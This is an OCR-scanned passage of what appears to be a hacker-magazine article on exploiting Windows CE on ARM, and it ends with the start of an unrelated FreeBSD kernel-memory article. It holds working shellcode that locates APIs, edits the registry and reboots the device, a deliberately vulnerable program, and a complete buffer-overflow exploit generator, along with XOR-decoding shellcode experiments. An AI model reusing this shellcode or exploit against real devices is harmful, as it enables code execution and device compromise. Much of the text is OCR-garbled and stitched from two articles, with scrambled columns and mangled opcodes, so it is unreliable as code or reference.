define SEC 4 /* Oxac Security table position A 
#define FIX 5 /* Oxb4 Fixup table position Ai 
define LITE_EXTRA 6 /* Only first 6 used by NK */ 
} e32_lite, *LPe32_ list; 
032_lite *o32_ptr; /* Oxbe 032 chain ptr */ 
DWORD dwNoNotify; /* OxcO 1 bit per process, set if notifications di 
sabled */ 
WORD wFlags; /* Oxc4 */ 
BYTE bTrustLevel; /* Oxc6 */ 
BYTE bPadding; /* Oxc7 */ 
PMODULE pmodResource; /* Oxc8 module that contains the resources */ 
DWORD rwLow; /* Oxcc base address of RW section for ROM DLL */ 
DWORD xcwHigh; /* OxdO high address RW section for ROM DLL */ 
PGPOOL_O pgqueue; /* Oxce list of the page owned by the module */ 
} Module; 


Module structure is defined in kernel.h. The third member of Module 
structure is lpszModName, which is the module name string pointer and it 
offsets 0x08 from the start of the Module structure. The Module name is 
unicode string. The second member of Module structure is pMod, which is an 
address that point to the next module in chain. So we can locate the 
coredll module by comparing the unicode string of its name. 


Offsets 0x74 from the start of Module structure has an e32 member and it 

is an e32_lite structure. Let’s look at the e32_lite structure, which 
defined in pehdr.h. In the e32_lite structure, member e32_vbase will tell 
us the virtual base address of the module. It offsets Ox7c from the start 
of Module structure. We else noticed the member of e32_unit [LITE_EXTRA], 

it is an info structure array. LITE_EXTRA is defined to 6 in the head of 
pehdr.h, only the first 6 used by NK and the first is export table position. 
So offsets Ox8c from the start of Module structure is the virtual relative 
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address of export table position of the module. 


From now on, we got the virtual base address of the coredll.dll and its 
virtual relative address of export table position. 


I wrote the following small program to list all modules of the system: 


; SetProcessorMode.s 


AREA | .text|, CODE, ARM 
EXPORT | SetProcessorMode | 
| SetProcessorMode| PROC 
mov EL Le ; different modes use different lr - save it 
msr cpsr_c, r0O ; assign control bits of CPSR 
mov pe, rl ; return 
END 


// list.cpp 
/* 


01F60000 coredll.dll 
nk), 


#include "stdafx.h" 


extern "C" void __stdcall SetProcessorMode (DWORD pMode) ; 


int WINAPI WinMain( HINSTANCE hInstance, 
HINSTANCE hPrevinstance, 
LPTSTR lpCmdLine, 
int nCmdShow) 
{ 
FILE *fp; 
unsigned int KDataStruct = OxFFFFC800; 
void *Modules = NULL, 
*BaseAddress = NULL, 
*D11Name = NULL; 


// switch to user mode 
//SetProcessorMode (0x10) ; 


if ( (fp = fopen("\\modules.txt", "w")) == NULL ) 

{ 
return 1; 

} 

// alnfo[KINX_MODULES] 

Modules = *( ( void ** ) (KDataStruct + 0x324)); 

while (Modules) { 
BaseAddress = *( ( void ** )( ( unsigned char * )Modules + Ox7c 
D11Name = *( ( void ** )( ( unsigned char * )Modules + 0x8 


fprintf(fp, "S08X %ls\n", BaseAddress, D1llName) ; 


Modules = *( ( void ** )( ( unsigned char * )Modules + Ox4 ) ); 


} 


fclose(fp); 
return (EXIT_SUCCESS) ; 


} 


In my environment, the Module structure is 0x8F453128 which in the kernel 


space. Most of Pocket PC ROMs were builded with Enable Full Kernel Mode 


option, so all applications appear to run in kernel mode. The first 5 bits 


of the Psr register is O0xlF when debugging, that means the ARM processor 
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runs in system mode. This value defined in nkarm.h: 


// ARM processor modes 

define USER_MODE 0x10 // 0b10000 

define FIQ_MODE Ox11 // 0610001 

define IRQ_MODE 0x12 // 0b10010 

define SVC_MODE 0x13 // Ob10011 

define ABORT_MODE 0x17 // 0610111 

define UNDEF_MODE O0xlb // Ob11011 

define SYSTEM_MODE Oxlf // 0b11111 

I wrote a small function in assemble to switch Bee eer mode because th 
EVC doesn’t support inline assembl The program won’t get the value of 


BaseAddress and DllName when I switohed the processor to user mode. It 
raised a access violate exception. 


I use this program to get the virtual base address of the coredll.dll is 
Ox01F60000 without change processor mode. But this address is invalid when 
I use EVC debugger to look into and the valid data is start from 
Ox01F61000. I think maybe Windows CE is for the purpose of save memory 
space or time, so it doesn’t load the header of dll files. 


Because we’ve got the virtual base address of the coredll.dll and its 
virtual relative address of export table position, so through repeat 
compare the API name by IMAGE _EXPORT_DIRECTORY structure, we can get the 


API address. IMAGE_EXPORT_DIRECTORY structure is just like other Win32 
n 


system’s, which defined in winnt.h: 
// WINCE420\PUBLIC\COMMON\SDK\INC\winnt.h 
typedef struct _IMAGE_EXPORT_DIRECTORY { 
DWORD Characteristics; /* 0x00 */ 
DWORD TimeDateStamp; /* 0x04 */ 
WORD MajorVersion; /* 0x08 */ 
WORD MinorVersion; /* Ox0a */ 
DWORD Name; /* Ox0c */ 
DWORD Base; /* 0x10 */ 
DWORD NumberOfFunctions; /* 0x14 */ 
DWORD NumberOfNames; /* 0x18 */ 
DWORD AddressOfFunctions; // Oxlec RVA from base of image 
DWORD AddressOfNames; // 0x20 RVA from base of image 
DWORD AddressOfNameOrdinals; // 0x24 RVA from base of image 
} IMAGE _EXPORT_DIRECTORY, *PIMAGE EXPORT DIRECTORY; 


[i % The Shellcode for Windows CE 


= 


There are something to notice before writing shellcode for Windows CE. 


= 


Windows CE uses r0-r3 as the first to fourth parameters of API, if the 
parameters of API larger than four that Windows CE will use stack to store 
the other parameters. So it will be careful to write shellcode, becaus 


the shellcode will stay in the stack. The test.asm is our shellcode: 


; Idea from WinCE4.Dust written by Ratter/29A 


; API Address Search 
; san@xfocus.org 


; armasm test.asm 
; link /MACHINE:ARM /SUBSYSTEM:WINDOWSCE test.obj 


CODE32 


EXPORT WinMainCRTStartup 


AREA .text, CODE, ARM 


test_start 
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; rll - base pointer 

test_code_start PROC 
bl get_export_section 
mov r2, #4 ; functions number 
bl find_func 
sub sp, Sp, 0x89, 30 ; weird after buffer overflow 
add r0O, sp, 8 
str r0O, sp] 
mov r3, #2 
mov r2, #0 
adr rl, key 
mov rO, OxA, 2 
mov lr, pc 
ldr pe, [r8, #-12] ; RegOpenKeyExW 
mov rO, 1 
str r0O, Sp, OxC] 
mov r3, 4 
str C3, Sp, 4] 
add rl, sp, #0xC 
str eles sp] 
;mMov r2, #0 
adr rl, val 
ldr r0O, [sp, #8] 
mov lr, pe 
ldr pce, [r8, #-8] ; RegSetValueExW 
ldr (Ol, Sp, 8] 
mov it, PC. 
ldr pc, [r8, #-4] ; RegCloseKey 
adr r0O, sf 
ldr r0O, [xr0] 
ear r0, =0x0101003c 
mov eal, 0 
mov 2, 0 
mov C3, 0 
mov lr, pe 
ldr jeer v8, #-16] ; KernelIoControl 


; basic wide string compare 
wstrcmp PROC 
wstrcemp_iterate 


ldrh r2, [r0O], #2 
ldrh 3; [aed]. ,) HZ 
cmp r2, #0 
cmpeq r3, #0 
moveq pe, Lr 
cmp T2726 3 
beq wstrcemp_iterate 
mov pe,.Lr 
ENDP 
7 output: 
; r0O - coredll base addr 
; rl - export section addr 
get_export_section PROC 
mov ely. Le 
adr r4, kd 
ldr r4, [r4] 
;ldr r4, =Oxffffc800 ; KDataStruct 
ldr r5, =0x324 ; aIlnfo[KINX_MODULES] 
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add 
ldr 
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Oy; “45. AED 
Fro; [£5] 


; r5 now points to first module 


mov 
mov 


iterate 
ldr 
adr 
bl 


ldreq 
ldreq 


add 
beg 


ldr 
cmp 
cmpne 
bne 


£6: 5) 

r7, #0 

x0, [xr6, #8] 
el, .-cored LL 
wstrcmp 


ri, [e6; Ox7c] 
r8, [xr6, #0x8c] 


B95) ey. -e8 
got_coredllbase 


r6, [xr6, #4] 
r6, #0 

r6, r5 
iterate 


got_coredllbase 


mov 
add 


mov 
ENDP 


r0O, r7 
rile, 85. EF 


pe, rll 


; vO — coredll base addr 


; rl - export section addr 
; v2 -— function name addr 
find_func PROC 

adr rs, fn 
find_func_loop 

ldr cr4, [xrl, #0x20] 

add r4, r4, x0 

mov r6, #0 


find_start 
ldr 
add 
;mov 


mov 

hash_loop 
ldrb 
cmp 
beg 
add 


ldrh 


r9, [xr7], #1 
r9, #0 
hash_end 


r10, x9, r10, ROR 


hash_loop 


r9, [r8] 


r10, r9 ; compare 


r6, x6, #1 
find_start 


v5, [rl, #0x24] 
Oy. “Boy 60 

16) WeOr2 “16 

r9, [xr5, r6] 
r5, [xrl, #0xlc] 


get dll name 
compare with coredll.dll 
get dll base 


get export section rva 


is it what we’re looking for? 


nope, go on 


yep, we’ve got imagebase 
and export section pointer 


AddressOfNames 


counter 


function name pointer 
find function name 


hash 


AddressOfNameOrdinals 


Ordinals 
AddressOfFunctions 
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add BS ps 52 0. 
ldr v9, [r5, r9, LSL #2]; function address rva 
add £9, 69, 0 ; function address 
str r9, [r8], #4 
subs E22; 12). #1 
bne find_func_loop 
mov pe, lr 
ENDP 
kd DCB 0x00, Oxc8, Oxff, Oxff ; Oxffffc800 
sf DCB Ox3c, 0x00, Ox01, Ox01 ; O0x0101003c 
fn DCB Oxe7, Ox9d, Ox3a, 0x28 ; KernellIoControl 
DCB Ox51, Oxdf, Oxf7, Ox0b ; RegOpenKeyExW 
DCB OxcO, Oxfe, Oxc0O, Oxd8 ; RegSetValueExW 
DCB 0x83, Ox17, Ox51, Ox0e ; RegCloseKey 
key DCB Wet 0x07 "ON; 0X0, "E™,. 0x05; ("I") 0x0, “WN, (00; "AN, 0x0; ER", 0x0; “EM, 
DCB WAAC 0x0, WA 0x0, "Ww", 0x0, wigs 0x0, mq", 0x0, wen, 0x0, noN 0x0, "mM 
DCB "m", 0x0, WANES 0x0, MeN 0x0, "BY, 0x0, Mes 0x0, new 0x0, Wows 0x0, Hh 
DCB Wes 0x0, Mg We 0x0, wg", 0x0, TATE 0x0, MAA s 0x0, mG 0x0, Me", 0x0, "h 
DCB Wer, Ox0, Nr", OX0, “aN, 0x0, "1", Ox0, 0x0, 0x0, Ox0,, 0x0 
val DCB "Ss", 0x0, “et, Ox0, "a", Oxd, "co", Ox0, “"k", OxX0, "M", Ox0,. “o", 0x0, "dd", 
DCB "e", 0x0, Ox0, Ox0 
coredll DCB Nem, 0x0, “o";. 0x0; “e", Oxd,. “et, 0x0, Nd", 0x0, "1", 0x0, “i, 0x0 
DCB wey, 0x0. Mat, “0x0; "I" OKO, MIM 2 0x07. OxO,. 0x0 
ALIGN 4 
LTORG 
test_end 
WinMainCRTStartup PROC 
b test_code_start 
ENDP 
END 
This shellcode constructs with three parts. Firstly, it calls the 


get_export_section function to obtain the virtual base address of coredll 


and its virtual 


relative address of export table position. The r0 and rl 


stored them. 


address through IMAGE_ 


addresses to 
implement of 
HKLM\SOFTWAR 


it calls the find_func function to obtain the API 
EXPORT_DIRECTORY structure and stores the API 


Second, 


its own hash value address. The last part is the function 
our shellcode, it changes the register key 
E\WIDCOMM\General\btconfig\StackMode to 1 and then uses 


KernellIoControl to soft restart the system. 


Windows CE.N 


ET provides BthGetMode and BthSetMode to get and set the 


bluetooth 


HKLM\SOFTWAR 
the bluetoot 
but it works 


Well, 
"ldr r4, 


va 
"ldr r4, 
program. 


and the shellcode will 
#0xC9, 


"mov x5, 


state. 
so BthSetMode 
way to open bluetooth in IPAQs (My PDA is HP1940). 


let’s look at the get_export_section function. 
=Oxffffc800" 
LDR pseudo-instruction. It can load a register with a 32-bit constant 
lue or an address. 
[pc, 
So the r4 register won’t get the Oxffffc800 value in shellcode, 


But HP IPAQs use the Widcomm stack which has its own API, 
can’t open the bluetooth for IPAQ. Well, there is another 
Just changing 
E\WIDCOMM\General\btconfig\StackMode to 1 and reset the PDA, 

h will open after system restart. This method is not pretty, 


Why I commented off 
instruction? We must notice ARM assembly language’s 


=Oxffffc800" will be 
r4 register depends on the 


nstruction 
EVC debugger, 


"ldr r4, 


The i 
i and th 


#0xX108)]" in 


fail. 
EVC debugger, 


=0x324" 
shellcod 


will be 
is executed 


The instruction "ldr r5, 
its ok when th 


30" in 


0x0 
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shellcode, 
va 


To save size, 


name will be encoded into 4 bytes. 


Win32 Assembly Components. 


You must 


install 


E:ARM /SUBSYSTI 


armasm test.asm 
link /MACHIN 


the EVC e 


necessary opcodes from 


EM:WINDOWSCE 


[The compile method is as following: 


13 


memory to register. 


test.obj 


nvironment first. 
EVC debugger or IDAPro or hex editors. 


After this, 


we can use hash technology to encode the API names. 
The hash technology is come from LSD’s 


’ 


1’ 


The simple solution is to write the large constant value among the 
and then use the ADR pseudo-instruction to load the address of 
lue to register and then read th 


Each API 


we can obtain the 


CODE 


XR 


EF: 58 


SetSystemPowerStatet 


UTlsPtr 
KTHRDINFO 


0x8004B138 ppfnMethods 


Ox8006C92C SC_PowerOffSystem 
trap address of SC_PowerOffSystem 


SC_KillThreadIfNeeded 


he system will check the KTHRDINFO 
n the MDCreateMainThread2 function of 


[ 8 System Call 
First, let’s look at the implementation of an API in coredll.dll: 
-text:01F75040 EXPORT PowerOffSystem 
-text:01F75040 PowerOffSystem 
\031p 
.text:01F75040 STMFD SP!, {R4,R5,LR} 
.text:01F75044 LDR R5, =OxFFFFC800 
.text:01F75048 LDR R4, =unk_1FC6760 
.text:O01F7504C LDR RO, R5] 
.text:01F75050 LDR Rl, [RO,#-0x14] 
.text:01F75054 TST Rl, ds 
.text:01F75058 iDRNE RO, R4] 
.text:01F7505C CMPNE RO, 0 
.text:01F75060 iDRNE Rl, RO, #0x13C] 
.text:01F75064 LDREQ R1, =OxFOOOFEC4 
.text:01F75068 MOV LR, PC 
.text:01F7506C MOV PC;- RL 
.text:01F75070 LDR R3, [R5] 
.text:01F75074 LDR RO, [R3,#-0x14] 
.text:01F75078 TST RO, #1 
.text:01F7507C \DRNE RO, [R4] 
.text:01F75080 CMPNE RO, #0 
.text:01F75084 iDRNE RO, [RO,#0x25C] 
.text:01F75088 MOVNE iR, PC 
.text:01F7508C MOVNE PC, RO 
.text:01F75090 LDMFD SP!, {R4,R5,PC} 
.text:01F75090 ; End of function PowerOffSystem 
Debugging into this API, we found t 
first. This value was initialized i 
PRIVATE\WINCEOS\COREOS\NK\KERNEL\ARM\mdram.c: 
if (kmode || bA11KMode) { 
plh->ctx.Psr = KERNEL MODE; 
KTHRDINFO (pTh) |= UTLS_INKMODE; 
} else { 
pTh->ctx.Psr = USER_MODE; 
KTHRDINFO (pTh) &= ~UTLS_INKMODE; 


If the application is in kernel mode, 


otherwise it will be 0. 
so the system follow by " 


0x8004B138 w 
and then it 
(0x13C/4=0x4 


F) 


PRIVATE\WINC 


flow to 


iDRNE RO, 
hich is the ppf 
"LDRNE Rl, 
and correspondi 


EOS\COREOS\NK\K 


ERNI 


this value will 


[R4]". 


[RO, #0x13C]". 


be set with 1, 

All applications of Pocket PC run in kernel mode, 
In my environment, 
nMethods pointer of SystemAPISets[SH_WIN32], 
Let’s look the offset 0x13C 
ing to the index of Win32Methods defined in 
EL\kwin32.h: 


the RO got 
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const PFNVOID Win32Methods[] = { 
(PFNVOID) SC_PowerOffSystem, // 79 
}; 


Well, the Rl got the address of SC_PowerOffSystem which is implemented in 
kernel. The instruction "LDREQ Rl, =OxFOOOFEC4" has no effect when th 
application run in kernel mode. The address OxFOOOFEC4 is system call 
which used by user mode. Some APIs use system call directly, such as 
SetKMode: 


.text:01F756C0 EXPORT SetKMode 
.text:01F756C0O SetKMode 

.text:01F756C0 

.text:O1F756C0O var_4 = -4 

.text:01F756C0 

.text:01F756C0 STR LR, [SP,#var_4]! 
.text:01F756C4 LDR Rl, =OxFOOOFE50 
.text:01F756C8 MOV LR, PC 
.text:O1F756CC MOV PG; GRaL 
.text:01F756D0 LDMFD SP!, {PC} 


Windows CE doesn’t use ARM’s SWI instruction to implement system call, it 
implements in different way. A system call is made to an invalid address 
in the range 0xf0000000 - Oxf0010000, and this causes a prefetch-abort 
trap, which is handled by PrefetchAbort implemented in armtrap.s. 
PrefetchAbort will check the invalid address first, if it is in trap area 
then using ObjectCall to locate the system call and executed, otherwise 
calling ProcessPrefAbort to deal with the exception. 


There is a formula to calculate the system call address: 


Oxf0010000-(256*apisettapinr) *4 


The api set handles are defined in PUBLIC\COMMON\SDK\INC\kfuncs.h and 
PUBLIC\COMMON\OAK\INC\psyscall.h, and the aipnrs are defined in several 
£ 

P 


iles, for example SH_WIN32 calls are defined in 
RIVATE\WINCEOS \COREOS \NK\KERNEL\kwin32.h. 


Well, let’s calculate the system call of KernellIoControl. The apiset is 0 
and the apinr is 99, so the system call is 0xf0010000-(256*0+99)*4 which 
is OxFOOOFE74. The following is the shellcode implemented by system call: 


#include "stdafx.h" 


int shellcode[] = 

{ 

OxE59F0014, // ldr r0, [pc, #20] 
OxE59F4014, // ldr r4, [pc, #20] 
OxE3A01000, // mov rl, #0 
OxE3A02000, // mov r2, #0 
OxE3A03000, // mov r3, #0 
OxE1AOEOOF, // mov lr, pe 
OxE1LAOFO04, // mov pc, r4 
0x0101003C, // ITOCTL_HAL_REBOOT 
OxFOOOFE74, // trap address of KernelIoControl 
}; 


int WINAPI WinMain( HINSTANCE hInstance, 
HINSTANCE hPrevinstance, 
LPTSTR lpCmdLine, 
int nCmdShow) 
{ 
((void (*) (void)) & shellcode) (); 


return 0; 
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} 


It works fine and we don’t need search API addresses. 


-—-[ 9 - Windows CE Buffer Overflow Exploitation 


The hello.cpp is the demonstration vulnerable program: 


// hello.cpp 
// 


#include "stdafx.h" 


int hello() 

{ 
FILE * binFileH; 
char binFile[] = 
char buf[512]; 


if ( (binFileH = 
{ 


"\\binfile"; 


fopen(binFile, "rb")) = 


printf("can’t open file %s!\n", binFile) 


return 1; 


} 


memset (buf, 0, sizeof (buf)); 
fread(buf, sizeof(char), 1024, binFileH); 


printf ("08x %d\ 
getchar(); 


fclose (binFileH) 


return 0; 


int WINAPI WinMain ( 


hello(); 


return 0; 


} 


The hello function has a buffer overflow prob] 
"binfile" of the root directory to stack variabl 
Because it reads 1KB contents, so if the "binfil 


n", &buf, strlen(buf)); 


’ 


HINST 
HINST 
LPTS1 
int 


TANCE hiInstance, 

TANCE hPrevinstance, 

[TR lpCmdLine, 
nCmdShow) 


NULL ) 


if 


lem. It reads data from the 


e "buf" by fread(). 
e" is larger than 512 


bytes, the stack variable "buf" will be overflowed. 


The printf and getchar are just for test. 
console.dll in windows direcotry. 


They have no effect without 


The console.dll 


file is come from 


Windows Mobile Developer Power Toys. 


ARM assembly language uses bl instruction to call 


into the hello function: 

6: int hello() 

is { 

22011000 str lr, [sp, #-4]! 
22011004 sub sp, sp, #0x89, 30 
8: FILE * binFileH; 

9: char binFile[] = "\\binfile"; 
26: } 

220110C4 add sp, sp, #0x89, 30 


220110C8 ldmia 


sp!, {pc} 


function. Let’s look 
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"str ir, bsp, 
stores the lr 
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#—-4] ! W 


address of hel 


lo caller. 


local 


variables. 


Function. It 


Function. 
obtain control 


to the loaded 


difference Slot 


know that the 


The variable’s memory address that allocated by program is correspo 


Slot, both 


is the first instruction of the hello() 
register to stack, 


"ldmia sp!, 
loads the return address of hello cal 
stack to the pe register, 
So overwriting the lr register that is stored in the stac 
1 when the hello function returned. 


at each start time. 
slot 0 is mapped from the current process’ 


16 


function. It 
and the lr register contains the return 
The second instruction prepairs stack memory for 
{pc}" is the last instruction of the hello() 
ler that stored in the 
and then the program will execute into WinMain 
k will 


nding 
stack and heap. The process may be loaded into 

So the base address always alters. We 
slot, so the base 


of its stack address is stable. 


The following is the exploit of hello program: 


/* exp.c - Windows CE 


* 
* 


ay 


define LR 


int shellcode 


OxEBO00026, 
OxE3A02004, 
OxEBOO003A, 
OxE24DDF89, 
OxE28D0008, 
OxE58D0000, 
OxE3A03002, 
OxE3A02000, 
OxE28F1F56, 
OxE3A0010A, 
OxELAOEOOF, 
OxE518F00C, 
OxE3A00001, 
OxE58D000C, 
OxE3A03004, 
OxE58D3004, 
OxE28D100C, 
OxE58D1000, 
OxE28F1F5F, 
OxE59D0008, 
OxELAOEOOF, 
OxE518F008, 
OxE59D0008, 
OxELAOEOOF, 
OxE518F004, 
OxE28FOCO1, 
0xE5900000, 
OxE3A01000, 
OxE3A02000, 
OxE3A03000, 
OxELAOEOOF, 
OxE518F010, 
OxEOD020B2, 
OxE0D130B2, 
0xE3520000, 
0x03530000, 
OxOLAOFOOE, 
0xE1520003, 
OxOAFFFFF8, 


san@xfocus. 


define NOP O0xE1A01001 
0x0002FC50 


org 


include<stdio.h> 


[] 


/* mov ri, 
/* return address */ 


Buffer Overflow Demo 


mepll */ 


6.txt 


OxELAOFOOE, 
OxELAOBOOE, 
OxE28F40BC, 
OxE5944000, 
OxE3A05FC9, 
OxE0845005, 
0OxE5955000, 
OxE1A06005, 
OxE3A07000, 
OxE5960008, 
OxE28F1F45, 
OxEBFFFFEC, 
Ox0596707C, 
0x0596808C, 
OxE0879008, 
0x0A000003, 
OxE5966004, 
OxE3560000, 
0x11560005, 
OxlAFFFFF4, 
OxE1AOO0007, 
OxE0881007, 
OxE1LAOFOOB, 
OxE28F8070, 
0xE5914020, 
OxE0844000, 
OxE3A06000, 
0xE4947004, 
OxE0877000, 
OxE3A0A000, 
OxE4D79001, 
OxE3590000, 
Ox0A000001, 
OxE089A3EA, 
OxEAFFFFFA, 
OxE5989000, 
OxE15A0009, 
0x12866001, 
OxlAFFFFF3, 
0xE5915024, 
OxE0855000, 
OxE0866006, 
OxE19590B6, 
OxE591501C, 
OxE0855000, 
OxE7959109, 
OxE0899000, 
OxE4889004, 
OxE2522001, 
OxlAFFFFES5, 
OxE1AOFOOE, 
OxFFFFC800, 
0x0101003C, 
Ox283A9DE7, 
OxOBF7DF51, 
OxD8COFECO, 
0x0E511783, 
Ox004F0053, 
0x00540046, 
0x00410057, 
0x00450052, 
Ox005CO05C, 
0x00690057, 
0x00630064, 
OxO006DO06F, 
Ox005CO06D, 
0x0042005C, 
0x00430074, 


Wed Apr 26 09:43:45 2017 


17 


6.txt Wed Apr 26 09:43:45 2017 18 


OxO006EOO6F, 
0x00690066, 
0x005C0067, 
0x0047005C, 
Ox006E0065, 
0x00720065, 
0x006CO0061, 
0x00000000, 
0x00740053, 
0x00630061, 
Ox004D006B, 
Ox0064006F, 
0x00000065, 
Ox006F0063, 
0x00650072, 
0x006C0064, 
Ox002E006C, 
0x006C0064, 
Ox0000006C, 


}; 


/* prints a long to a string */ 
char* put_long(char* ptr, long value) 


{ 


int 


} 


*otr (char) (value >> 0) & Oxff; 
*otr (char) (value >> 8) & Oxff; 
*per (char) (value >> 16) & Oxff; 
*otr (char) (value >> 24) & Oxff; 


return ptr; 


main () 


FILE * binFileH; 

char binFile[] = "binfile"; 
char buf[544]; 

char *ptr; 

int. “1; 


if ( (binFileH fopen(binFile, "wb")) == NULL ) 
printf("can’t create file %s!\n", binFile); 
return 1; 


} 


memset (buf, 0, sizeof (buf)-1); 
ptr = buf; 


for (i = 0; i < 4; itt) { 

ptr = put_long(ptr, NOP); 
} 
memcpy (buf+16, shellcode, sizeof (shellcode) ); 
put_long(ptr-16+540, LR); 


fwrite (buf, sizeof(char), 544, binFileH); 
fclose (binFileH) ; 


We choose a stack address of slot 0, and it points to our shellcode. It 


will 
use 
exp] 


l overwrite the return address that stored in the stack. We can also 
a jump address of virtual memory space of the process instead of. This 
loit produces a "binfile" that will overflow the "buf" variable and the 


return address that stored in the stack. 


After the binfile copied to the PDA, the PDA restarts and open the 
bluetooth when the hello program is executed. That’s means the hello 
program flowed to our shellcode. 
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While I changed another method to construct the exploit string, its as 
following: 


pad...pad|/return address|nop...nop...shellcode 


And the exploit produces a 1KB "binfile". But the PDA is freeze when th 
hello program is executed. It was confused, I think maybe the stack of 
Windows CE is small and the overflow string destroyed the 2KB guard on the 
top of stack. It is freeze when the program call a API after overflow 
occurred. So, we must notice the features of stack while writing exploit 


= 


for Windows CE. 


EVC has some bugs that make debug difficult. First, EVC will write some 
arbitrary data to the stack contents when the stack releases at the end of 
function, so the shellcode maybe modified. Second, the instruction at 
breakpoint maybe change to O0xE6000010 in EVC while debugging. Another bug 
is funny, the debugger without error while writing data to a .text address 
by step execute, but it will capture a access violate exception by execute 
directly. 


--[ 10 -— About Decoding Shellcode 


The shellcode we talked above is a concept shellcode which contains lots 

of zeros. It executed correctly in this demonstrate program, but some other 
vulnerable programs maybe filter the special characters before buffer 
overflow in some situations. For example overflowed by strcpy, the 
shellcode will be cut by the zero. 


It is difficult and inconvenient to write a shellcode without special 
characters by API search method. So we think about the decoding shellcode. 
Decoding shellcode will convert the special characters to fit characters 
and make the real shellcode more universal. 


The newer ARM processor(such as arm9 and arml0) has a Harvard architecture 
which separates instruction cache and data cache. This feature will 
improve the performance of processor, and most of RISC processors have 
this feature. But the self-modifying code is not easy to implement, 
because it will puzzled by the caches and the processor implementation 
after being modified. 


Let’s look at the following code first: 
#include "stdafx.h" 


int weird[] = 


0xE3A01099, // mov rl, #0x99 
OxE5CF1020, // strb cl, [pc, #0x20] 
OxE5CF1020, // strb rl, [pc, #0x20] 
OxE5CF1020, // strb rl, [pc, #0x20] 
OxE5CF1020, // strb rl, [pc, #0x20] 
OxE1A01001, // mov Bl goed. pad 
0xE1A01001, 

0xE1A01001, 

0xE1A01001, 

OxE1A01001, 

0xE1A01001, 

OxE3A04001, // mov c4, #0x1 
OxE3A03001, // mov v3, #0x1 
OxE3A02001, // mov r2, #0x1 
OxE3A01001, // mov rl, #0x1 
0xE6000010, // breakpoint 


}; 
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int WINAPI WinMain( HINSTANCE hInstance, 
HINSTANCE hPrevinstance, 
LPTSTR lpCmdLine, 
int nCmdShow) 
{ 
((void (*) (void)) & weird) (); 


return 0; 


} 


That four strb instructions will change the immediate value of the below 
mov instructions to 0x99. It will break at that inserted breakpoint while 
executing this code in EVC debugger directly. The rl-r4 registers got 0x99 
in S3C2410 which is a arm9 core processor. It needs more nop instructions 
to pad after modified to let the rl-r4 got 0x99 while I tested this code 
in my friend’s PDA which has a Intel Xscale processor. I think the reason 
maybe is that the arm9 has 5 pipelines and the arml0 has 6 pipelines. Well 
, I changed it to another method: 


OxE28F3053, // add v3, pc, #0x53 
0xE3A01010, // mov vl, #0x10 

OxE7D32001, // ldrb r2, [63, +r1] 
OxE2222088, // eor r2, r2, #0x88 
OxE7C32001, // strb £2,- [3 #r1] 
0xE2511001, // subs rl, rl, #1 

OxlAFFFFFA, // bne 28011008 

//OxE1AO100F, // mov rl, pe 

//0XE3A02020, // mov r2, #0x20 
//O0XE3A03D05, // mov 63, 5, 26 
//OXEEO71F3A, // mcr pl5, 0, rl, c7, cl10, 1 ; clean and invalidate each entry 
//0xE0811002, // add Bis. BL, BO 
//0xE0533002, // subs 3 ).°R3; 2 
//OxXCAFFFFFB, // bgt |weird+28h (30013058) | 
//0xE0211001, // eor vl, rl, rl 
//OXEEO71F9A, // mcr pl5, 0, rl, c7, cl10, 4 ; drain write buffer 
//OxEEO71F15, // mcr pl5,. 0; £1, <7, ¢5, 0 ;- flush the icache 
OxE1A01001, // mov rl, rl; pad 

OxE1A01001, 

OxE1A01001, 

OxE1A01001, 

OxE1A01001, 

OxE1A01001, 

OxE1A01001, 

OxE1A01001, 

OxE1A01001, 

OxE1A01001, 

OxE1A01001, 

OxE1A01001, 

OxE1A01001, 

OxE1A01001, 

OxE1A01001, 

OxE1A01001, 

Ox6B28C889, // mov c4, #0xl ; encoded 
Ox6B28B889, // mov v3, #0x1 

Ox6B28A889, // mov r2, #0x1 

0x6B289889, // mov rl, #0xl1 


O0xE6000010, // breakpoint 


The four mov instructions were encoded by Exclusive-OR with 0x88, the 
decoder has a loop to load a encoded byte and Exclusive-OR it with 0x88 
and then stored it to the original position. The rl-r4 registers won’t get 
Oxl even you put a lot of pad instructions after decoded in both arm9 and 
arml0 processors. I think maybe that the load instruction bring on a cache 


problem. 
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ARM Architecture Reference Manual has a chapter to introduce how to deal 
with self-modifying code. It says the caches will be flushed by an 
operating system call. Phil, the guy from Odd shared his experience to m 

He said he’s used this method successful on ARM system(I think his 
environment maybe is Linux). Well, this method is successful on AIX PowerPC 
and Solaris SPARC too(I’ve tested it). But SWI implements in a different 


way 


= 


under Windows CE. The armtrap.s contains implementation of SWIHandler 


which does nothing except ’movs pc,lr’. So it has no effect after decode 
finished. 


Because Pocket PC’s applications run in kernel mode, so we have privilege 
to access the system control coprocessor. ARM Architecture Referenc 

Manual introduces memory system and how to handle cache via the system 
control coprocessor. After looked into this manual, I tried to disable the 
instruction cache before decod 


mre 
bic 
mcr 


But 


pls, <0, 22,-cel, 20... 0 
rl, rl, #0x1000 
pls, 0, rly EL; -60, 0 


the system freezed when the mcr instruction executed. Then I tried to 


invalidate entire instruction cache after decoded: 


eor 
mcr 


But 


--[ 


The 


Edy, Sel ek 
ploy: Oy wis ly ca; 0 


it has no effect too. 


11 - Conclusion 


codes talked above are the real-life buffer overflow example on 


Windows CE. It is not perfect, but I think this technology will be improved 
in the future. 


Because of the cache mechanism, the decoding shellcode is not good enough. 


Internet and handset devices are growing quickly, so threats to the PDAs 


and 


mobiles become more and more serious. And the patch of Windows CE is 


more difficult and dangerous than the normal Windows system to customers. 


= 


Because th ntire Windows CE system is stored in the ROM, if you want to 
patch the system flaws, you must flush the ROM, And the ROM images of 
various vendors or modes of PDAs and mobiles aren’t compatible. 


[ 
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--[{ 1.0 - Introduction 


The kernel memory interface or kvm interface was first introduced in 
SunOS. Although it has been around for quite some time, many people still 
consider it to be rather obscure. This article documents the basic usage 
of the Kernel Data Access Library (libkvm), and will explore some ways to 
use libkvm (/dev/kmem) in order to alter the behavior of a running FreeBSD 
system. 


FreeBSD kernel hacking skills of a moderate level (i.e. you know how to 
use ddb), as well as a decent understanding of C and x86 Assembly (AT&T 
Syntax) are required in order to understand the contents of this article. 


This article was written from the perspective of a FreeBSD 5.4 Stable 
System. 


Note: Although the techniques described in this article have been explored 
in other articles (s References), they are always from a Linux or Windows 
perspective. I personally only know of one other text that touches on the 
information contained herein. That text entitled "Fun and Games with 
FreeBSD Kernel Modules" by Stephanie Wehner explained some of the things 
one can do with libkvm. Considering the fact that one can do much more, 

and that documentation regarding libkvm is scarce (man pages and source 
code aside), I decided to write this article. 


--[ 2.0 - Finding System Calls 


Note: This section is extremely basic, if you have a good grasp of the 
